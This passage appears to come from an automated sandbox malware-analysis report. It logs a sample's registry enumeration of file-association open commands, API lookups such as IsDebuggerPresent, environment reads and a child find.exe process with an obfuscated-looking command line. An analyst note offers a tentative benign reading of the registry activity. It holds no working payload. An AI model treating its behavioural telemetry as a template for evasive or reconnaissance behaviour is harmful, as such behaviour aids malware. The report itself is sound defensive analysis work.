Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileUI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileUI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Schedule.Service\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Schedule.Service.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\scrfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\script\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptBridge.ScriptBridge\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptBridge.ScriptBridge.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptedDiag.Engine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptedDiag.Engine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.Dictionary\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.Encoder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.FileSystemObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scripting.Signer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\scriptlet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Behavior\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Constructor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Context\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.Factory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.HiFiTimer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.HostEncode\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.SvrOm\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Scriptlet.TypeLib\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\scriptletfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.ASP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.Automation\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.Behavior\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptletHandler.Event\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptoSys.Scripto\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptoSys.Scripto.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDBACKUPCONFIG.SdBackupConfig\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDBACKUPCONFIG.SdBackupConfig.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sdchange.sdchangeobj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sdchange.sdchangeobj.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDConfig.AutoPlayHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDConfig.AutoPlayHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdGITManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdGITManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdWhcNotifier\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.CSdWhcNotifier.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.SdEngine2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDENGINE.SdEngine2.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdController\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdController.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdrRestoreService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SdrService.SdrRestoreService.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDRun.AutoPlayHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDRun.AutoPlayHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSHELLEXTENSION.SdShellExtension\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSHELLEXTENSION.SdShellExtension.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSnapin.SDSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSnapin.SDSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SDSnapinAbout.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\search\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\search-ms\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorDSO\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorDSO.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorErrors\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CollatorErrors.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CommandCreator\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CommandCreator.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CscHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CscHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CustomWordbreaker\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.CustomWordbreaker.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.DirMonitorNotifier\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.DirMonitorNotifier.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherMgr\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherMgr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotify\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotify.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotifyInline\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedGatherNotifyInline.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedSearchSvcAdmin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.EmbeddedSearchSvcAdmin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FileHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FileHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilesystemBackupProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilesystemBackupProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilterRegistration\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.FilterRegistration.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Gatherer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Gatherer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GathererLogFileProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GathererLogFileProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherMgr\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherMgr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotify\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotify.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotifyInline\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherNotifyInline.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherTrx\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.GatherTrx.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Indexer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.Indexer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.JetPropStore\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.JetPropStore.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LanguageResource\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LanguageResource.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LoadLangRes\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.LoadLangRes.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MAPI2Handler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MAPI2Handler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MapPI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MapPI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MediaCenterHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.MediaCenterHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NlCiIndex\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NlCiIndex.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NullWB\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.NullWB.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OneIndexHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OneIndexHandler.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OutlookToolbar\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.OutlookToolbar.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.ShellFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.ShellFolder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.ShellFolderr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.StickyNotesHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.StickyNotesHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.TripoliIndexer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.TripoliIndexer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.XmlContentFilter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Search.XmlContentFilter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SearchConnectorFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SearchFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SecurityDescriptor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.Sensor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.Sensor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorDataReport\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorDataReport.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SensorsApi.SensorManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\service\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\service4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapeCollector.ShapeCollector\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapeCollector.ShapeCollector.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapewareVISIO10\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShapewareVISIO20\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.ClipboardCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.ClipboardCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragDownloadCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragDownloadCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragUploadCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.DragUploadCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.ExportDatabase\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OfflineClient\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.OpenDocuments.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.SpreadsheetLauncher\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.SpreadsheetLauncher.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.SpreadsheetLauncher.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.StssyncHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.StssyncHandler.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePoint.StssyncHandler.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SharePointWorkspace.Application.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SHCmdFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Application.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Autoplay\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Autoplay.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.CDBurn\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Explorer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Explorer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.Explorer.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.FolderView\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.FolderView.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.HWEventHandlerShellExecute\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.HWEventHandlerShellExecute.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.UIHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Shell.UIHelper.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShellNameSpace.ShellNameSpace\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShellNameSpace.ShellNameSpace.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.10\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.11\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.6\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.7\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.8\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ShockwaveFlash.ShockwaveFlash.9\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sip\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\sips\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SKBMonitor.KeyStrokeMonitor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SKBMonitor.KeyStrokeMonitor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SketchObj.SketchInk\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SketchObj.SketchInk.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\skypecast15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.FolderSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.FolderSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.HTMLSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.HTMLSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.OCXSnapin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Snapins.OCXSnapin.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\soap\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SOFTWARE\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SoftwareDistribution.VistaWebControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SoftwareDistribution.VistaWebControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CSD\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CustomProperty\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CustomPropertySet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.CustomPropertySets\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\solution_utils.dll.PropertySetDefs\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SoundRec\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SPCFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SpeechUX.ConfigUI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SpeechUX.ConfigUI.1\Shell\Open\Command - False 1
Fn
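For performance reasons, the remaining 1196 entries are omitted.
The remaining entries can be found in glog.xml.
Analyst note: every entry visible in this part of the table is an Open Key on HKEY_LOCAL_MACHINE\Software\Classes\<ProgID>\Shell\Open\Command, walked in alphabetical order; no write or delete operation appears among them. Success = False most likely means the ProgID has no Shell\Open\Command subkey, and True that the subkey exists. This is the pattern produced by enumerating file-type associations, and it appears to be a side effect of the association lookup piped into find "SHCm" (Process #6) rather than registry tampering. Confirm against glog.xml before excluding these keys from triage.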
Module (10)
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7feff0e0000 True 1
Fn
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegEnumKeyW, address_out = 0x7feff0fbf20 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 137561 True 1
Fn
Environment (9)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #6: find.exe
0 0
Information Value
ID #6
File Name c:\windows\system32\find.exe
Command Line fINd "SHCm"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:42, Reason: Self Terminated
Monitor Duration 00:00:03
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xaf0
Parent PID 0xae0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAF4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory rw True False False -
find.exe.mui 0x000e0000 0x000e0fff Memory Mapped File rw False False False -
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory rw True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory rw True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory rw True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory rw True False False -
